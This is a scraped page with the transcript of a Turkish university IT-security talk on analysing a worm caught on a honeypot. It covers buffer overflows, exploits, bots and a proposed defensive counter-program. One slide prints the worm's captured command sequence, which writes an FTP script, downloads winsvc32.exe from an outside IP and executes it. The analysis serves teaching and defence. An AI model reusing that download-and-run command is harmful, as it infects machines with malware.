BİR WORM’UN ANATOMİSİ Gökhan AKIN Asım GÜNEŞ

Slides:



Advertisements
Benzer bir sunumlar
TEMEL AĞ TANIMLARI.
Advertisements

HTTP’yi (istemci tarafı) kendi kendinize deneyin
Internet Öğr. Gör. Tufan MENGİ.
Ağ ve Sistem Yönetimi Şubesi
Mustafa Akgül Linux Kullanıcılar Derneği LINUX, E-DEVLET VE BİLGİ TOPLUMU.
İÇERİK Ağ İzleme Ağ güvenliği için Tehlikeli Protokoller
Kullanıcı Erişimi Yönetim Sistemi İTÜ/KEYS
Bilgisayar 1 Dr İsmail Marulcu Dr. Ismail Marulcu
Hostİng (bulundurma-yer sağlama) HİZMETİ
AĞ PROTOKOLÜ.
DOVECOT İLE IMAP VE POP3 SERVER KURULUMU
BTP 108 BİLGİSAYAR AĞ SİSTEMLERİ AĞ KAVRAMI Birden çok bilgisayarın birbirine bağlı olarak kullanılmasıyla oluşturulan çalışma biçimine bilgisayar ağı.
İnternet ve e-posta Yönetimi
BİLGİ GÜVENLİĞİ Bilgi Gizliliği ve Güvenliği Zararlı Yazılımlar
AĞ GÜVENLİĞİ.
Çerez(Cookie) Kullanımı Oturum Yönetimi
Web Sayfası Bilgilendirme Toplantısı
BİLGİ TEKNOLOJİSİNİN TEMEL KAVRAMLARI
Bilgisayar ve internet güvenliği için yardımcı programlar
BİLGİSAYARI AÇMA - KAPATMA
SON KULLANICI HATALARI BİLGİ İŞLEM DAİRE BAŞKANLIĞI SON KULLANICI HATALARI Cengiz Acartürk 03 Ekim 2003.
Virüsler ve Diğer Zararlı Yazılımlar
BAĞLANTI (KÖPRÜ) OLUŞTURMA
İşletim Sistemleri Tanım: Kullanıcı ile bilgisayar donanımı arasında bağlantıyı sağlayan özel bir yazılımdır.
İnternet Teknolojisi Temel Kavramlar
WEB TASARIMINDA TEMEL KAVRAMLAR
Sistem ve Ağ Yönetiminde Parola Yönetim Zorlukları
İnternet Programlama PHP.
Cemil ŞAHİN Bilişim Teknolojileri Öğretmeni
ŞİŞECAM’DA BİLGİ GÜVENLİĞİ
BİLGİSAYARDA GÜVENLİK
YAZILIM Bilgisayarın kullanılmasını sağlayan her türlü program yazılım olarak adlandırılır. Başlıca iki yazılım çeşidi vardır. Bu yazılımlar, sistem yazılımı.
Dosya İzinleri Öğr. Gör. Mustafa SARIÖZ BİLGİSAYAR TEKNOLOJİLERİ VE PROGRAMLAMA BÖLÜMÜ BİLG 223 AĞ İŞLETİM SİSTEMLERİ DERSİ.
BİT’in Gizlilik ve Güvenlik Boyutları
Ankara Ü. Fen Fakültesi Astronomi ve Uzay Bilimleri Bölümü AST302 Astronomide Veri Analizi II MySQL sunucusuna bağlantı Hazırlayan Yahya Demircan 2011.
İnternet Teknolojisi Temel Kavramlar
Anahtarlama Cihazları ile Laboratuvarların Internet Bağlantısının Etkin Kullanımı Fatih Ertam Akademik Bilişim 2013 Akdeniz Üniversitesi.
INTERNET EXPLORER TEMEL İŞLEMLER GOOGLE ARAMA TEKNİKLERİ
BİLGİ GÜVENLİĞİ Bilgi Gizliliği ve Güvenliği Zararlı Yazılımlar
BİLGİ GÜVENLİĞİ.
Kullanıcı Seçeneklerini Güncelleme Kullanıcı güncelleme işlemi konsol ve grafik ortamdan yapılabilir. Komut Satırı ile Kullanıcı Seçeneklerini Güncelleme.
BİLGİ GÜVENLİĞİ Bilgi Gizliliği ve Güvenliği Zararlı Yazılımlar
Bilgisayarın kullanılmasını sağlayan her türlü program yazılım olarak adlandırılır. YAZILIM Başlıca iki yazılım çeşidi vardır. Bu yazılımlar, sistem yazılımı.
Yönlendirici (Router) Güvenliği
ZARARLI YAZILIMLAR.
BİT’İN GİZLİLİK VE GÜVENLİK BOYUTLARI
KIRKLARELİ ÜNİVERSİTESİ
Bilgisayar 1 Dr İsmail Marulcu Musa İNCEKARA
BİT’İN GİZLİLİK VE GÜVENLİK BOYUTLARI
KÖTÜ AMAÇLI YAZILIMLAR
Ağ Donanımları Ağ Nedir ? Ağ Donanımları Bridge Hub Switch Router
ZARARLI YAZILIMLAR MUSTAFA TEZCAN ARALIK,2015.
BİT’in Gizlilik ve Güvenlik Boyutları.  Bilgi; verinin, işlenerek karar verici için anlamlı ve kullanışlı hale gelmesidir. Veri ise, işletme içinde oluşan.
Çomar neyi çözecek? ● Ayarlama arayüzleri görev tabanlı olmalı ● Gündelik işler için komut satırı gerekmemeli ● Belgeleri yalnızca programcılar okuyor.
BİLGİ GÜVENLİĞİ Bilgi Gizliliği ve Güvenliği Zararlı Yazılımlar
FTP Nedir ? Deniz Kaya FTP NEDİR ? Ftp (File Transfer Protocol), dosya gönderme protokolü manası gelir. Bir bilgisayardan bir başka bilgisayar.
VİRÜSLER VE DİĞER ZARARLI YAZILIMLAR. Virüs, casus yazılımlar (spyware), solucan, adware vb. zararlı yazılımlar (malware), reklam, sanal suçlar, bazen.
Virüsler ve Diğer Zararlı Yazılımlar
BİLGİSAYARDA DONANIM ve YAZILIM
BİT’İN GİZLİLİK VE GÜVENLİK BOYUTLARI
BİLGİ GÜVENLİĞİ Bilgi Gizliliği ve Güvenliği Zararlı Yazılımlar
BİLGİ GÜVENLİĞİ Bilgi Gizliliği ve Güvenliği Zararlı Yazılımlar
FTP Server Eray Demir
BİLGİ GÜVENLİĞİ Bilgi Gizliliği ve Güvenliği Zararlı Yazılımlar
VİRÜSLER VE DİĞER ZARARLI YAZILIMLAR
VISUAL STUDIO İÇERİSİNDE VERİ TABANI BAĞLANTISI ACCESS DATA SOURCE SAVAŞ TUNÇER
BİLGİ GÜVENLİĞİ Bilgi Gizliliği ve Güvenliği Zararlı Yazılımlar
Bilgisayar Yazılımları
ZARARLI YAZILIMLAR GİZEM ALACI 10/F 821. V IRÜSLER Virüsler, bilgisayarlar ilk çıktığı zamanlardan bu yana devamlı gündemde olmuş zararlı yazılımlardır.
I-BEKCI SİSTEMİNİN KAMPUS ORTAMINDA KULLANIMI
Sunum transkripti:

Gökhan AKIN Asım GÜNEŞ gokhan.akin@itu.edu.tr asim.gunes@itu.edu.tr BİR WORM’UN ANATOMİSİ Gökhan AKIN Asım GÜNEŞ gokhan.akin@itu.edu.tr asim.gunes@itu.edu.tr İTÜ Bilgi İşlem Daire Bşk.

Bu konu nerden çıktı?

Ağdaki İstenmeyen Trafik P2P trafiği Kullanıcının bilgisi dahiliden olmadan bilgisayarının yarattığı trafik. Peki kim bu ?

Worm sözcüğü Türkçe'de kurt, solucan anlamlarına sahiptir. Worm Nedir? Worm sözcüğü Türkçe'de kurt, solucan anlamlarına sahiptir.

Worm Nedir? Worm, kendi kopyalarını ya da parçalarını başka bilgisayar sistemlerine yayabilen bir program ya da program kümesidir. Yayılma genellikle ağ bağlantıları üzerinden ya da e-posta ekleri yoluyla gerçekleşir.

Worm Bulaşacak Bilgisayar Lazım

Yem Bilgisayar Hazır

Ve Son Olarak...

Ve Bekleme... Ama Neyi 

Paketleri İnceleme

Ve Birşey Bulduk Galiba

Buffer Overflow “buffer” geçici olarak kullanılan bellek bölgesine verilen addır. Eğer yanlışlıkla (veya bilerek…) buffer’a buffer’ın boyutundan daha fazla veri yazdırırsanız (buna “buffer overflow” denir) buffer taşar ve “return address” inin üzerine yazar.

Buffer Overflow

İşletilen Komutlar 1- cmd /c: Peşinden gelen dizini komut satırında çalıştır ve daha sonra pencereyi kapat. 2- Aşağıda belirtilmiş satırları sırası ile “ii” isimli yeni oluşturulan dosyanın içine yaz. - echo open 160.75.200.200 7690 >> ii - echo user 1 1 >> ii - echo get winsvc32.exe >> ii - echo bye >> ii 3- ftp -n -v -s:ii : ftp programını aşağıda detayları verilmiş parametreler ile aç. “-n”: Otomatik kullanıcı adı şifre sorma kısmını atla. “-v”: Bağlanılan sunucunun yolladığı yazıları atla. “-s ii” : “ii” isimli dosyadaki komutları çalıştır. Yani 160.75.200.200 isimli sunucunun 7690inci portuna bağlan, kullanıcı adı şifre olarak 1 ve 1 ver. Winsvc32.exe isimli dosyayı ftp sunucusunda idir ve ftp programını kapat. 4- del ii : Ftp erisimde kullanılanı ii isimli dosyayı sil. 5- winsvc32.exe : Wormu çalıştır.

Gerçekten bir FTP Sunucusuna Bağlantı Kurulmuş mu?

Winsvc32.exe Ne?

Bir Bilene Sorduk

EXPLOIT Yetkisi olmadan daha yetkili bir kullanıcının (Linux’de root kullanıcısı , Windows’da administrator kullanıcısı gibi) yetkilerine, işletim sistemin zaaflarından yararlanarak sahip olmayı sağlayan programlar...

Ne çok var!

Örnek Hazır Kod

Sonra Ne Oldu?

Sutt.p0rr.org

Sonra Ne Olmuştu?

Biz de Bağlandık

Yani Sadece Worm Değil Aynı Zamanda Bir TRUVA ATI Bir bilgisayarın uzaktan kullanıcının bilgisi haricinde, kendi amaçları için yönetilmesini sağlayan program.

Ya da BOT’ta denebilir Kullanıcının bilgisi dışında DDoS salıdırısı gerçekleştirmek, SPAM mektup yollamak vs için yazılmış yazılımlar.

Elimizdeki Worm Kısaca Bir FTP sunucu barındıran Gereken EXPLOIT kodunu barındıran Kendini FTP üzerinde kopyalayan IRC sunucusuna bağlanıp emir alan bir program.

Yeni Worm Yazmak En kötüsü bir kere programlanmış bir worm daha sonra kodunda yapılacak çok küçük bir müdahale ile yeni exploitler için revize edilip tekrar tehdidini sürdürmeye devam etmektedir.

Bizde Bir Program Yazalım O Zaman

Nasıl Bir Program? Ama biz worm değil bir Kuş programı yazalım. Peki Kuş neler yapabilir? Kurtları yer  Yani : Aynı EXPLOIT’i kullanarak; Kullanıcı bilgisayarında bir uyarı mesajı çıkartılabilir. Worm’lanma riski taşıyan bilgisayarların listesini çıkartabilir. Ve hatta uzaktan gerken güvenlik yamasını bile yapabilir

Karga V1.0

Karga V1.0

SONUÇ Wormlar bulaştığı bilgisayardan her türlü bilgi hırsızlığı yapabildiği gibi: - Kendini bulaştırmak için yarattıkları trafik ile de bant genişliğinin israfı Ağ cihazlarında gereksiz işlemci yüküne Toplu bir DoS atağı yapmaları durumunda bütün altyapıyı çalımaz hale getirebilir.

SONUÇ Wormlar ile sebep olunan durumlar ciddi bir ulusal güvenlik sorunu oluşturmaktadır. Bunun için A.B.D.’de Ulusal CERT kurumlarının sponsorluğu ile Ulusal Güvenlik Açıkları Veritabanı oluşturulmuştur. National Vulnerability Database, http://nvd.nist.gov/

www2.itu.edu.tr/~akingok Sorular ve Cevaplar www2.itu.edu.tr/~akingok